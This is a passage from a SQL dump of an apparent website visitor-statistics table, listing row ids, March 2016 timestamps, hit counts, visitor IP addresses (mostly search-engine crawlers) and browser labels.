130.193.51.81','other'),(14320,1457212115,1,1,0,0,'5.255.253.110','other'),(14321,1457212119,1,1,0,0,'141.8.142.8','other'),(14322,1457212333,1,0,1,0,'66.249.66.158',''),(14323,1457212843,1,0,1,0,'66.249.66.129',''),(14324,1457212893,1,1,0,0,'51.255.65.78','other'),(14325,1457212949,1,0,1,0,'66.249.66.166',''),(14326,1457212970,3,0,3,0,'66.249.66.162',''),(14327,1457212974,1,1,0,0,'217.69.133.221','other'),(14328,1457213221,1,1,0,0,'51.255.65.44','other'),(14329,1457213523,1,1,0,0,'217.69.133.231','other'),(14330,1457213573,1,1,0,0,'217.69.133.217','other'),(14331,1457213587,3,0,3,0,'66.249.66.158',''),(14332,1457213633,1,1,0,0,'91.196.178.40','chrome'),(14333,1457214237,15,15,0,0,'141.8.184.18','other'),(14334,1457214239,7,7,0,0,'141.8.183.14','other'),(14335,1457214243,9,9,0,0,'178.154.149.11','other'),(14336,1457214599,1,0,1,0,'68.180.229.232',''),(14337,1457214706,2,0,2,0,'66.249.66.158',''),(14338,1457214717,1,1,0,0,'141.8.142.8','other'),(14340,1457214718,1,1,0,0,'5.255.253.62','other'),(14341,1457214719,1,1,0,0,'141.8.132.109','other'),(14342,1457214720,1,1,0,0,'141.8.184.31','other'),(14344,1457214721,1,1,0,0,'5.255.253.103','other'),(14345,1457214723,1,1,0,0,'141.8.132.97','other'),(14346,1457214733,1,1,0,0,'141.8.132.99','other'),(14348,1457214734,1,1,0,0,'5.255.253.110','other'),(14350,1457214735,1,1,0,0,'5.255.253.55','other'),(14351,1457214736,1,1,0,0,'130.193.37.27','other'),(14352,1457214737,1,1,0,0,'130.193.51.45','other'),(14354,1457214765,1,1,0,0,'66.249.93.94','other'),(14355,1457214852,1,1,0,0,'51.255.65.76','other'),(14356,1457214885,1,1,0,0,'180.76.15.155','other'),(14357,1457214995,1,1,0,0,'37.9.122.201','other'),(14358,1457214999,1,1,0,0,'178.154.189.203','other'),(14359,1457215148,1,1,0,0,'95.133.238.95','chrome'),(14360,1457215268,2,0,2,0,'66.249.66.166',''),(14361,1457215339,1,1,0,0,'207.46.13.143','other'),(14362,1457215438,1,0,1,0,'66.249.66.162',''),(14363,1457216407,3,0,3,0,'66.249.66.158',''),(14364,1457216498,2,2,0,0,'77.232.164.65','chrome'),(14365,1457216660,16,16,0,0,'141.8.184.18','other'),(14366,1457216662,11,11,0,0,'178.154.149.11','other'),(14367,1457216666,1,1,0,0,'141.8.183.14','other'),(14369,1457217620,53,53,0,0,'136.243.48.86','chrome'),(14374,1457217660,1,1,0,0,'178.154.189.202','other'),(14375,1457217787,1,1,0,0,'51.255.65.72','other'),(14376,1457217941,2,0,2,0,'66.249.66.162',''),(14377,1457218214,1,1,0,0,'217.69.133.219','other'),(14378,1457218252,6,6,0,0,'178.154.149.11','other'),(14379,1457218253,7,7,0,0,'93.158.152.9','other'),(14380,1457218254,6,6,0,0,'141.8.184.18','other'),(14381,1457218256,3,3,0,0,'5.255.253.53','other'),(14382,1457218259,3,3,0,0,'130.193.37.21','other'),(14383,1457218264,2,2,0,0,'141.8.183.14','other'),(14384,1457218341,2,0,2,0,'66.249.66.166',''),(14385,1457218357,1,1,0,0,'217.69.133.85','other'),(14386,1457218452,1,1,0,0,'217.69.133.68','other'),(14387,1457218481,1,1,0,0,'207.46.13.80','other'),(14388,1457218549,1,1,0,0,'66.249.93.94','other'),(14389,1457218731,1,1,0,0,'66.249.92.103','other'),(14390,1457218903,1,1,0,0,'180.76.15.157','other'),(14391,1457219228,1,1,0,0,'217.69.133.237','other'),(14392,1457219372,1,1,0,0,'217.69.136.210','other'),(14393,1457219383,2,2,0,0,'178.154.189.204','other'),(14394,1457219425,1,1,0,0,'157.55.39.66','other'),(14395,1457219752,2,2,0,0,'217.69.133.194','other'),(14396,1457220071,1,0,1,0,'66.249.66.133',''),(14397,1457220256,1,1,0,0,'207.46.13.106','other'),(14398,1457220333,2,2,0,0,'178.154.149.11','other'),(14399,1457220334,2,2,0,0,'141.8.184.18','other'),(14400,1457220352,1,1,0,0,'8.29.198.26','other'),(14401,1457220964,1,1,0,0,'217.69.133.238','other'),(14402,1457222403,1,0,1,0,'68.180.229.232',''),(14403,1457222562,5,5,0,0,'178.154.189.204','other'),(14404,1457222598,2,0,2,0,'66.249.66.162',''),(14405,1457222611,2,0,2,0,'66.249.66.158',''),(14406,1457222692,1,0,1,0,'66.249.66.129',''),(14407,1457222862,1,0,1,0,'66.249.66.166',''),(14408,1457223141,1,1,0,0,'178.137.209.205','chrome'),(14409,1457223936,1,1,0,0,'217.69.133.230','other'),(14410,1457223954,1,1,0,0,'217.69.133.224','other'),(14411,1457224132,1,1,0,0,'217.69.133.226','other'),(14412,1457224239,1,0,1,0,'66.249.66.166',''),(14413,1457224407,2,0,2,0,'66.249.66.162',''),(14414,1457224664,1,0,1,0,'66.249.66.158',''),(14415,1457224805,1,1,0,0,'217.69.133.228','other'),(14416,1457224930,1,1,0,0,'217.69.133.235','other'),(14417,1457225067,1,1,0,0,'178.154.149.11','other'),(14418,1457225071,1,1,0,0,'130.193.51.102','other'),(14419,1457225083,1,1,0,0,'141.8.132.74','other'),(14420,1457225087,1,1,0,0,'130.193.51.50','other'),(14421,1457225092,1,1,0,0,'141.8.184.31','other'),(14422,1457225096,1,1,0,0,'130.193.50.31','other'),(14423,1457225100,1,1,0,0,'141.8.142.60','other'),(14424,1457225104,1,1,0,0,'5.255.253.53','other'),(14425,1457225108,1,1,0,0,'5.255.253.17','other'),(14426,1457225112,1,1,0,0,'141.8.132.99','other'),(14427,1457225399,1,1,0,0,'178.154.189.204','other'),(14428,1457225444,1,0,1,0,'68.180.229.232',''),(14429,1457225636,1,1,0,0,'217.69.136.203','other'),(14430,1457225907,1,1,0,0,'217.69.136.206','other'),(14431,1457226073,2,0,2,0,'66.249.66.162',''),(14432,1457226282,3,0,3,0,'66.249.66.166',''),(14433,1457226431,1,1,0,0,'217.69.133.68','other'),(14434,1457226833,2,2,0,0,'141.8.184.18','other'),(14435,1457226842,1,1,0,0,'5.255.253.10','other'),(14436,1457228460,2,0,2,0,'66.249.66.158',''),(14437,1457228595,3,0,3,0,'66.249.66.162',''),(14438,1457228783,1,0,1,0,'66.249.66.166',''),(14439,1457228830,2,0,2,0,'66.249.66.133',''),(14440,1457228844,1,0,1,0,'66.249.66.190',''),(14441,1457228951,1,1,0,0,'66.249.92.103','other'),(14442,1457229061,1,1,0,0,'51.255.65.51','other'),(14443,1457229333,1,0,1,0,'68.180.229.232',''),(14444,1457229379,1,1,0,0,'5.255.253.9','other'),(14445,1457229480,1,1,0,0,'217.69.133.222','other'),(14446,1457229967,3,1,2,0,'66.249.66.162',''),(14447,1457229986,2,1,1,0,'66.249.66.158',''),(14448,1457230126,1,0,1,0,'66.249.66.166',''),(14449,1457230359,1,1,0,0,'217.69.133.228','other'),(14450,1457231144,1,1,0,0,'217.69.133.240','other'),(14451,1457231145,1,1,0,0,'217.69.133.235','other'),(14452,1457231177,1,1,0,0,'8.29.198.26','other'),(14453,1457231211,1,1,0,0,'217.69.143.51','other'),(14454,1457231326,1,1,0,0,'141.8.184.18','other'),(14455,1457231331,1,1,0,0,'93.158.152.9','other'),(14456,1457231392,1,1,0,0,'217.69.133.223','other'),(14458,1457231394,1,1,0,0,'217.69.133.68','other'),(14459,1457231395,1,0,1,0,'66.249.66.162',''),(14460,1457231485,1,1,0,0,'217.69.136.203','other'),(14461,1457231658,1,1,0,0,'79.98.107.90','chrome'),(14462,1457232184,3,0,3,0,'66.249.66.158',''),(14463,1457233056,4,4,0,0,'178.154.149.11','other'),(14464,1457233061,3,3,0,0,'141.8.184.18','other'),(14465,1457233145,1,1,0,0,'207.46.13.143','other'),(14466,1457233260,1,1,0,0,'51.255.65.22','other'),(14467,1457233589,1,0,1,0,'66.249.66.166',''),(14468,1457233744,1,1,0,0,'207.46.13.106','other'),(14469,1457233872,3,3,0,0,'83.218.232.238','other'),(14470,1457233941,1,1,0,0,'130.193.37.21','other'),(14471,1457233958,5,5,0,0,'82.193.127.15','other'),(14472,1457233973,1,1,0,0,'141.8.184.18','other'),(14473,1457233984,3,0,3,0,'66.249.66.158',''),(14474,1457234333,1,0,1,0,'68.180.229.232',''),(14475,1457234338,1,1,0,0,'40.77.167.86','other'),(14476,1457234679,1,0,1,0,'66.249.66.166',''),(14477,1457234742,1,1,0,0,'207.46.13.106','other'),(14478,1457234758,3,3,0,0,'62.210.107.201','other'),(14479,1457234858,2,0,2,0,'66.249.66.162',''),(14480,1457234913,1,1,0,0,'51.255.65.15','other'),(14481,1457235021,1,1,0,0,'217.69.133.229','other'),(14482,1457235055,1,1,0,0,'217.69.133.224','other'),(14483,1457235141,1,1,0,0,'5.255.253.30','other'),(14484,1457235144,2,2,0,0,'5.255.253.55','other'),(14485,1457235149,2,2,0,0,'141.8.132.76','other'),(14486,1457235153,3,3,0,0,'130.193.51.85','other'),(14487,1457235157,3,3,0,0,'141.8.142.8','other'),(14488,1457235169,2,2,0,0,'93.158.152.9','other'),(14489,1457235173,2,2,0,0,'130.193.51.43','other'),(14490,1457235177,3,3,0,0,'5.255.253.110','other'),(14491,1457235196,2,2,0,0,'93.158.152.26','other'),(14492,1457235201,3,3,0,0,'141.8.184.11','other'),(14493,1457235204,2,2,0,0,'141.8.142.10','other'),(14494,1457235212,2,2,0,0,'5.255.253.10','other'),(14495,1457235215,1,1,0,0,'141.8.132.97','other'),(14496,1457235225,2,2,0,0,'141.8.142.41','other'),(14497,1457235236,3,3,0,0,'141.8.184.18','other'),(14498,1457235249,1,1,0,0,'5.255.253.53','other'),(14499,1457235253,1,1,0,0,'130.193.37.21','other'),(14500,1457235265,2,2,0,0,'130.193.51.45','other'),(14501,1457235275,2,2,0,0,'141.8.132.2','other'),(14502,1457235302,1,1,0,0,'5.255.253.9','other'),(14503,1457235319,1,1,0,0,'141.8.184.22','other'),(14504,1457235336,1,1,0,0,'141.8.183.14','other'),(14505,1457235344,1,1,0,0,'141.8.132.99','other'),(14506,1457235349,1,1,0,0,'5.255.253.100','other'),(14507,1457235355,1,1,0,0,'217.69.133.219','other'),(14508,1457235379,1,1,0,0,'130.193.37.27','other'),(14509,1457235756,2,0,2,0,'66.249.66.158',''),(14510,1457235982,2,0,2,0,'66.249.66.166',''),(14511,1457236051,2,1,1,0,'66.249.66.162',''),(14512,1457236240,1,1,0,0,'217.69.133.218','other'),(14513,1457236260,1,1,0,0,'82.145.211.142','other'),(14514,1457236769,1,1,0,0,'51.255.65.58','other'),(14515,1457236852,1,1,0,0,'217.69.143.46','other'),(14516,1457237006,1,1,0,0,'180.76.15.14','other'),(14517,1457237311,1,1,0,0,'217.69.136.203','other'),(14518,1457237696,4,4,0,0,'80.91.162.99','other'),(14519,1457237724,1,1,0,0,'217.69.133.240','other'),(14520,1457237856,1,1,0,0,'207.46.13.106','other'),(14521,1457237895,1,1,0,0,'51.255.65.42','other'),(14522,1457237908,1,1,0,0,'66.102.9.84','firefox'),(14523,1457238010,3,0,3,0,'66.249.66.158',''),(14524,1457238135,1,0,1,0,'66.249.66.190',''),(14525,1457238154,1,1,0,0,'141.8.183.14','other'),(14526,1457238355,1,1,0,0,'217.69.136.205','other'),(14527,1457238433,5,5,0,0,'144.76.7.107','other'),(14528,1457238744,2,1,1,0,'66.249.66.162',''),(14529,1457239019,1,1,0,0,'207.46.13.106','other'),(14530,1457239245,1,1,0,0,'66.249.92.103','other'),(14531,1457239277,1,1,0,0,'207.46.13.143','other'),(14532,1457239382,3,0,3,0,'66.249.66.158',''),(14533,1457239462,1,0,1,0,'66.249.66.166',''),(14534,1457239553,1,1,0,0,'178.154.149.11','other'),(14535,1457239985,1,1,0,0,'217.69.133.219','other'),(14536,1457239989,1,0,1,0,'66.249.66.162',''),(14537,1457240018,1,0,1,0,'68.180.229.232',''),(14538,1457240349,1,1,0,0,'217.69.143.56','other'),(14539,1457240456,1,1,0,0,'217.69.133.227','other'),(14540,1457240465,1,1,0,0,'66.249.66.158','other'),(14541,1457240516,3,3,0,0,'80.91.162.99','other'),(14542,1457240672,1,1,0,0,'217.69.133.226','other'),(14543,1457240815,2,0,2,0,'66.249.66.166',''),(14544,1457240866,5,5,0,0,'141.8.184.18','other'),(14545,1457241178,8,8,0,0,'178.154.149.11','other'),(14546,1457241191,1,1,0,0,'141.8.183.14','other'),(14547,1457241215,2,2,0,0,'207.46.13.106','other'),(14548,1457241220,2,2,0,0,'93.158.152.9','other'),(14549,1457241302,1,1,0,0,'217.69.133.84','other'),(14550,1457241676,1,1,0,0,'40.77.167.86','other'),(14551,1457241838,1,1,0,0,'66.249.66.129','other'),(14552,1457241934,1,1,0,0,'66.249.66.190','other'),(14553,1457241993,1,1,0,0,'8.29.198.25','other'),(14554,1457242435,2,0,2,0,'66.249.66.166',''),(14555,1457242498,1,0,1,0,'68.180.229.232',''),(14556,1457242782,3,0,3,0,'66.249.66.162',''),(14557,1457243002,1,1,0,0,'51.255.65.74','other'),(14558,1457243158,1,1,0,0,'217.69.136.207','other'),(14559,1457243205,2,0,2,0,'66.249.66.158',''),(14560,1457243279,1,1,0,0,'51.255.65.59','other'),(14561,1457244171,1,1,0,0,'141.8.183.14','other'),(14562,1457244257,1,1,0,0,'66.249.66.129','other'),(14563,1457244410,3,0,3,0,'66.249.66.166',''),(14564,1457244434,1,0,1,0,'66.249.66.162',''),(14565,1457244565,1,1,0,0,'66.249.66.133','other'),(14566,1457244650,1,1,0,0,'180.76.15.33','other'),(14567,1457244728,1,0,1,0,'68.180.229.232',''),(14568,1457245034,2,1,1,0,'66.249.66.162',''),(14569,1457245068,2,0,2,0,'66.249.66.158',''),(14570,1457245467,2,0,2,0,'66.249.66.129',''),(14571,1457245474,1,1,0,0,'66.249.66.162','other'),(14572,1457245610,1,1,0,0,'66.249.66.129','other'),(14573,1457245619,6,6,0,0,'136.243.172.46','chrome'),(14574,1457245826,2,1,1,0,'66.249.66.158',''),(14575,1457245836,1,1,0,0,'66.249.93.94','other'),(14576,1457245864,1,1,0,0,'66.249.66.133','other'),(14577,1457246114,2,1,1,0,'66.249.66.166',''),(14578,1457246244,1,1,0,0,'141.8.184.18','other'),(14579,1457246249,1,1,0,0,'5.255.253.53','other'),(14580,1457246393,1,1,0,0,'62.210.215.100','chrome'),(14581,1457246475,2,0,2,0,'66.249.66.162',''),(14582,1457246613,1,1,0,0,'217.69.143.50','other'),(14583,1457246857,1,1,0,0,'217.69.133.223','other'),(14584,1457247351,1,1,0,0,'141.8.184.11','other'),(14585,1457247355,3,3,0,0,'130.193.37.21','other'),(14586,1457247360,1,1,0,0,'141.8.184.18','other'),(14587,1457247364,1,1,0,0,'130.193.37.27','other'),(14588,1457247388,4,0,4,0,'66.249.66.158',''),(14589,1457247425,2,2,0,0,'130.193.51.85','other'),(14590,1457247428,2,2,0,0,'5.255.253.110','other'),(14591,1457247432,2,2,0,0,'5.255.253.9','other'),(14592,1457247436,1,1,0,0,'141.8.132.2','other'),(14593,1457247444,1,1,0,0,'178.154.149.11','other'),(14594,1457247453,1,1,0,0,'141.8.132.79','other'),(14595,1457247457,1,1,0,0,'5.255.253.55','other'),(14596,1457247465,1,1,0,0,'141.8.142.10','other'),(14597,1457247620,1,1,0,0,'207.46.13.106','other'),(14598,1457247647,2,2,0,0,'93.158.152.9','other'),(14599,1457247655,2,2,0,0,'93.158.152.26','other'),(14600,1457247659,1,1,0,0,'130.193.51.45','other'),(14601,1457247664,2,2,0,0,'141.8.142.41','other'),(14602,1457247672,1,1,0,0,'141.8.183.14','other'),(14603,1457247676,1,1,0,0,'130.193.51.43','other'),(14604,1457247693,1,1,0,0,'141.8.142.88','other'),(14605,1457247886,1,0,1,0,'66.249.66.166',''),(14606,1457248130,1,0,1,0,'66.249.66.162',''),(14607,1457248344,1,1,0,0,'66.249.66.158','other'),(14608,1457248421,1,1,0,0,'217.69.133.237','other'),(14609,1457248882,4,4,0,0,'141.8.132.109','other'),(14610,1457248917,1,1,0,0,'91.124.182.203','firefox'),(14611,1457249091,2,2,0,0,'141.8.132.66','other'),(14612,1457249239,1,1,0,0,'141.8.184.31','other'),(14613,1457249240,3,3,0,0,'5.255.253.103','other'),(14614,1457249337,3,3,0,0,'130.193.37.27','other'),(14615,1457249473,3,3,0,0,'178.154.189.6','other'),(14616,1457249474,2,2,0,0,'5.255.253.62','other'),(14617,1457249476,3,3,0,0,'141.8.132.74','other'),(14618,1457249477,3,3,0,0,'5.255.253.17','other'),(14619,1457249478,3,3,0,0,'5.255.253.89','other'),(14620,1457249479,1,1,0,0,'5.255.253.9','other'),(14621,1457249480,1,1,0,0,'141.8.132.97','other'),(14622,1457249481,1,1,0,0,'130.193.37.21','other'),(14623,1457249482,3,3,0,0,'141.8.142.8','other'),(14625,1457249484,3,3,0,0,'141.8.142.60','other'),(14626,1457249485,2,2,0,0,'141.8.132.44','other'),(14627,1457249487,3,3,0,0,'130.193.50.22','other'),(14628,1457249488,1,1,0,0,'93.158.152.65','other'),(14629,1457249489,3,3,0,0,'130.193.51.55','other'),(14630,1457249490,2,2,0,0,'130.193.51.43','other'),(14631,1457249493,1,1,0,0,'5.255.253.55','other'),(14632,1457249494,2,2,0,0,'5.255.253.110','other'),(14633,1457249496,2,2,0,0,'5.255.253.51','other'),(14634,1457249505,3,3,0,0,'141.8.142.10','other'),(14636,1457249506,1,1,0,0,'141.8.142.88','other'),(14637,1457249507,1,1,0,0,'130.193.51.85','other'),(14638,1457249508,1,1,0,0,'5.255.253.94','other'),(14639,1457249511,1,1,0,0,'141.8.184.6','other'),(14640,1457249514,2,2,0,0,'141.8.184.22','other'),(14641,1457249516,1,1,0,0,'130.193.51.45','other'),(14642,1457249517,1,1,0,0,'141.8.142.55','other'),(14643,1457249520,1,1,0,0,'178.154.189.12','other'),(14644,1457249528,8,0,8,0,'66.249.66.158',''),(14645,1457249753,2,0,2,0,'66.249.66.162',''),(14646,1457249767,1,0,1,0,'66.249.66.166',''),(14647,1457249892,1,1,0,0,'66.249.66.129','other'),(14648,1457250108,1,1,0,0,'66.249.66.158','other'),(14649,1457250220,1,1,0,0,'66.249.92.95','other'),(14650,1457250271,1,1,0,0,'178.154.189.204','other'),(14651,1457250396,1,0,1,0,'68.180.229.232',''),(14652,1457250540,6,2,4,0,'66.249.66.162',''),(14653,1457250658,1,1,0,0,'5.255.253.94','other'),(14654,1457250659,1,1,0,0,'5.255.253.55','other'),(14655,1457250660,1,1,0,0,'5.255.253.110','other'),(14656,1457250864,1,1,0,0,'66.249.66.133','other'),(14657,1457251009,6,6,0,0,'85.93.89.232','firefox'),(14658,1457251025,4,4,0,0,'85.93.89.74','firefox'),(14659,1457251146,5,0,5,0,'66.249.66.158',''),(14660,1457251364,1,1,0,0,'217.69.143.53','other'),(14661,1457251485,1,1,0,0,'141.8.184.6','other'),(14662,1457251487,1,1,0,0,'141.8.142.10','other'),(14663,1457251519,4,0,4,0,'66.249.66.162',''),(14664,1457251898,1,0,1,0,'68.180.229.232',''),(14665,1457251979,1,1,0,0,'66.249.66.166','other'),(14666,1457252015,1,1,0,0,'66.249.66.158','other'),(14667,1457252092,1,1,0,0,'217.69.133.237','other'),(14669,1457252225,2,2,0,0,'66.249.66.129','other'),(14670,1457252285,1,1,0,0,'130.193.51.43','other'),(14671,1457252416,1,1,0,0,'66.249.66.133','other'),(14672,1457252637,1,1,0,0,'217.69.133.224','other'),(14673,1457252848,1,1,0,0,'8.29.198.26','other'),(14674,1457252930,1,0,1,0,'66.249.66.158',''),(14675,1457253080,129,129,0,0,'82.193.127.15','other'),(14676,1457253181,1,1,0,0,'141.8.132.97','other'),(14677,1457253182,1,1,0,0,'178.154.189.6','other'),(14678,1457253206,1,1,0,0,'66.249.66.129','other'),(14679,1457253316,2,0,2,0,'66.249.66.166',''),(14680,1457253325,1,1,0,0,'207.46.13.171','other'),(14681,1457253328,2,0,2,0,'66.249.66.162',''),(14682,1457253374,1,1,0,0,'141.8.142.55','other'),(14683,1457253375,2,2,0,0,'141.8.132.74','other'),(14684,1457253376,1,1,0,0,'5.255.253.17','other'),(14685,1457253377,1,1,0,0,'130.193.51.43','other'),(14687,1457253379,1,1,0,0,'130.193.37.27','other'),(14688,1457253381,1,1,0,0,'93.158.152.65','other'),(14690,1457253382,1,1,0,0,'141.8.132.76','other'),(14691,1457253434,1,1,0,0,'66.249.93.90','firefox'),(14692,1457253527,2,1,1,0,'66.249.66.190',''),(14693,1457253821,1,1,0,0,'217.69.133.70','other'),(14694,1457253867,1,0,1,0,'66.249.66.133',''),(14695,1457253937,1,1,0,0,'217.69.136.209','other'),(14696,1457254073,1,1,0,0,'51.255.65.5','other'),(14697,1457254116,1,1,0,0,'217.69.143.67','other'),(14698,1457254165,1,0,1,0,'68.180.229.232',''),(14699,1457254173,1,0,1,0,'66.249.66.158',''),(14700,1457254174,3,2,1,0,'66.249.66.158',''),(14701,1457254210,2,1,1,0,'66.249.66.162',''),(14702,1457254277,1,1,0,0,'141.8.142.10','other'),(14703,1457254288,1,1,0,0,'217.69.136.210','other'),(14704,1457254348,1,1,0,0,'217.69.133.225','other'),(14705,1457254552,1,1,0,0,'66.249.93.90','other'),(14706,1457254944,1,1,0,0,'207.46.13.106','other'),(14707,1457255091,2,0,2,0,'66.249.66.158',''),(14708,1457255126,1,0,1,0,'66.249.66.162',''),(14709,1457255264,1,0,1,0,'66.249.66.166',''),(14710,1457255495,3,3,0,0,'141.8.142.88','other'),(14711,1457255496,2,2,0,0,'130.193.37.27','other'),(14712,1457255497,1,1,0,0,'5.255.253.51','other'),(14714,1457255498,2,2,0,0,'141.8.142.60','other'),(14715,1457255499,1,1,0,0,'130.193.51.45','other'),(14716,1457255500,1,1,0,0,'93.158.152.65','other'),(14717,1457255501,3,3,0,0,'141.8.142.10','other'),(14718,1457255502,2,2,0,0,'141.8.132.97','other'),(14719,1457255503,3,3,0,0,'141.8.132.76','other'),(14720,1457255504,2,2,0,0,'178.154.189.6','other'),(14721,1457255505,1,1,0,0,'5.255.253.62','other'),(14722,1457255506,3,3,0,0,'141.8.132.44','other'),(14723,1457255507,1,1,0,0,'130.193.50.22','other'),(14724,1457255508,2,2,0,0,'5.255.253.17','other'),(14726,1457255509,2,2,0,0,'141.8.184.11','other'),(14727,1457255510,1,1,0,0,'130.193.51.81','other'),(14728,1457255512,1,1,0,0,'141.8.142.41','other'),(14729,1457255513,4,4,0,0,'141.8.142.55','other'),(14730,1457255515,1,1,0,0,'5.255.253.103','other'),(14731,1457255516,5,5,0,0,'5.255.253.53','other'),(14732,1457255518,1,1,0,0,'5.255.253.110','other'),(14733,1457255724,2,1,1,0,'66.249.66.166',''),(14734,1457255741,1,1,0,0,'217.69.143.60','other'),(14735,1457256082,3,1,2,0,'66.249.66.166',''),(14736,1457256157,2,1,1,0,'66.249.66.162',''),(14737,1457256192,5,5,0,0,'130.193.37.21','other'),(14738,1457256195,2,2,0,0,'141.8.142.8','other'),(14739,1457256198,1,1,0,0,'5.255.253.10','other'),(14740,1457256199,1,1,0,0,'141.8.184.22','other'),(14741,1457256202,1,1,0,0,'178.154.149.11','other'),(14742,1457256203,2,2,0,0,'5.255.253.100','other'),(14743,1457256207,5,5,0,0,'141.8.184.18','other'),(14744,1457256210,2,2,0,0,'141.8.132.99','other'),(14745,1457256212,3,3,0,0,'93.158.152.9','other'),(14746,1457256214,3,3,0,0,'141.8.183.14','other'),(14747,1457256860,4,0,4,0,'66.249.66.158',''),(14748,1457256874,2,2,0,0,'217.69.133.216','other'),(14749,1457256875,1,1,0,0,'217.69.133.67','other'),(14750,1457256923,1,1,0,0,'217.69.143.55','other'),(14752,1457256928,1,1,0,0,'51.255.65.94','other'),(14753,1457256942,1,1,0,0,'91.124.194.187','firefox'),(14754,1457256952,1,1,0,0,'75.98.9.249','other'),(14755,1457257323,1,1,0,0,'207.46.13.106','other'),(14756,1457257379,1,0,1,0,'68.180.229.232',''),(14757,1457257595,2,2,0,0,'66.249.66.166','other'),(14758,1457257601,1,0,1,0,'66.249.66.162',''),(14759,1457257901,1,1,0,0,'217.69.143.68','other'),(14760,1457258026,1,1,0,0,'217.69.133.217','other'),(14761,1457258102,1,1,0,0,'217.69.133.227','other'),(14762,1457258278,8,0,8,0,'66.249.66.158',''),(14763,1457258346,1,1,0,0,'217.69.133.68','other'),(14764,1457258351,1,1,0,0,'78.111.190.25','chrome'),(14765,1457258468,1,1,0,0,'91.196.178.104','chrome'),(14766,1457258558,3,0,3,0,'66.249.66.162',''),(14767,1457258729,1,1,0,0,'91.124.182.203','firefox'),(14768,1457259261,1,1,0,0,'40.77.167.86','other'),(14769,1457259574,1,0,1,0,'66.249.66.166',''),(14770,1457259581,1,0,1,0,'66.249.66.162',''),(14771,1457259654,1,1,0,0,'217.69.133.228','other'),(14772,1457259656,1,1,0,0,'217.69.133.227','other'),(14773,1457259705,1,1,0,0,'217.69.133.67','other'),(14774,1457259910,1,1,0,0,'51.255.65.28','other'),(14775,1457260504,1,1,0,0,'157.55.39.211','other'),(14776,1457260511,1,1,0,0,'66.249.92.95','other'),(14777,1457260636,1,0,1,0,'66.249.66.166',''),(14778,1457260689,1,1,0,0,'51.255.65.81','other'),(14779,1457260789,2,0,2,0,'66.249.66.162',''),(14780,1457260800,1,1,0,0,'51.255.65.16','other'),(14781,1457260807,3,0,3,0,'66.249.66.158',''),(14782,1457261233,1,1,0,0,'51.255.65.3','other'),(14783,1457261361,1,1,0,0,'207.46.13.106','other'),(14784,1457261364,1,1,0,0,'217.69.133.219','other'),(14785,1457261608,1,1,0,0,'91.196.178.168','chrome'),(14786,1457261637,1,1,0,0,'5.255.253.55','other'),(14787,1457261638,1,1,0,0,'5.255.253.53','other'),(14788,1457261640,2,2,0,0,'141.8.132.99','other'),(14790,1457261659,1,1,0,0,'66.249.66.166','other'),(14791,1457262228,4,0,4,0,'66.249.66.158',''),(14792,1457262243,1,1,0,0,'217.69.143.65','other'),(14793,1457262333,3,0,3,0,'66.249.66.162',''),(14794,1457262595,2,0,2,0,'66.249.66.166',''),(14795,1457263414,1,1,0,0,'178.154.189.204','other'),(14796,1457263482,1,1,0,0,'217.69.143.70','other'),(14797,1457263509,4,0,4,0,'66.249.66.158',''),(14798,1457263531,3,0,3,0,'66.249.66.162',''),(14799,1457263589,9,9,0,0,'178.154.149.11','other'),(14800,1457263590,6,6,0,0,'141.8.184.18','other'),(14801,1457263607,4,0,4,0,'66.249.66.166',''),(14802,1457263667,1,1,0,0,'217.69.133.225','other'),(14803,1457263669,1,1,0,0,'8.29.198.25','other'),(14804,1457263922,7,7,0,0,'141.8.183.14','other'),(14805,1457263938,4,4,0,0,'93.158.152.9','other'),(14806,1457263944,1,1,0,0,'5.255.253.53','other'),(14807,1457264037,1,1,0,0,'91.124.182.203','firefox'),(14808,1457264371,1,1,0,0,'217.69.133.226','other'),(14809,1457264436,1,0,1,0,'66.249.66.162',''),(14810,1457264440,3,0,3,0,'66.249.66.158',''),(14811,1457264453,2,2,0,0,'217.69.143.63','other'),(14812,1457264705,1,0,1,0,'66.249.66.133',''),(14813,1457264714,1,0,1,0,'66.249.66.129',''),(14814,1457264815,2,1,1,0,'66.249.66.158',''),(14815,1457264826,1,1,0,0,'66.249.66.129','other'),(14816,1457264857,1,1,0,0,'51.255.65.75','other'),(14817,1457264911,17,17,0,0,'80.91.162.99','other'),(14818,1457264928,1,0,1,0,'66.249.66.166',''),(14819,1457265022,1,1,0,0,'217.69.133.231','other'),(14820,1457265367,1,1,0,0,'66.249.93.90','other'),(14821,1457265379,1,0,1,0,'68.180.229.232',''),(14822,1457265632,1,1,0,0,'180.76.15.156','other'),(14823,1457265910,1,1,0,0,'217.69.133.236','other'),(14824,1457266098,15,0,15,0,'66.249.66.158',''),(14825,1457266186,10,10,0,0,'141.8.184.18','other'),(14826,1457266187,8,8,0,0,'93.158.152.9','other'),(14827,1457266190,7,7,0,0,'5.255.253.53','other'),(14828,1457266191,11,11,0,0,'178.154.149.11','other'),(14829,1457266196,8,8,0,0,'141.8.183.14','other'),(14830,1457266317,1,1,0,0,'217.69.133.240','other'),(14831,1457266320,2,0,2,0,'66.249.66.166',''),(14832,1457266517,1,0,1,0,'68.180.229.232',''),(14833,1457266600,1,1,0,0,'51.255.65.76','other'),(14834,1457267315,1,0,1,0,'66.249.66.166',''),(14835,1457267316,4,0,4,0,'66.249.66.162',''),(14836,1457267525,1,1,0,0,'207.46.13.171','other'),(14837,1457267702,1,1,0,0,'51.255.65.25','other'),(14838,1457267842,1,1,0,0,'217.69.143.70','other'),(14839,1457267848,10,0,10,0,'66.249.66.158',''),(14840,1457268058,1,1,0,0,'217.69.143.53','other'),(14841,1457268247,1,0,1,0,'68.180.229.232',''),(14842,1457268427,1,1,0,0,'194.187.216.46','chrome'),(14843,1457268470,1,1,0,0,'51.255.65.47','other'),(14844,1457268869,1,1,0,0,'217.69.133.230','other'),(14845,1457268871,2,2,0,0,'217.69.133.232','other'),(14846,1457268951,1,1,0,0,'66.249.93.94','other'),(14847,1457268971,1,1,0,0,'217.69.143.50','other'),(14848,1457269143,6,0,6,0,'66.249.66.158',''),(14849,1457269203,2,0,2,0,'66.249.66.162',''),(14850,1457269217,1,1,0,0,'217.69.133.216','other'),(14851,1457269676,1,1,0,0,'178.154.149.11','other'),(14852,1457269680,13,13,0,0,'141.8.184.18','other'),(14853,1457269709,1,1,0,0,'141.8.183.14','other'),(14854,1457269714,1,1,0,0,'93.158.152.9','other'),(14855,1457269806,1,1,0,0,'207.46.13.106','other'),(14856,1457269836,1,1,0,0,'217.69.133.222','other'),(14857,1457270106,4,0,4,0,'66.249.66.162',''),(14858,1457270123,5,0,5,0,'66.249.66.158',''),(14859,1457270227,2,0,2,0,'66.249.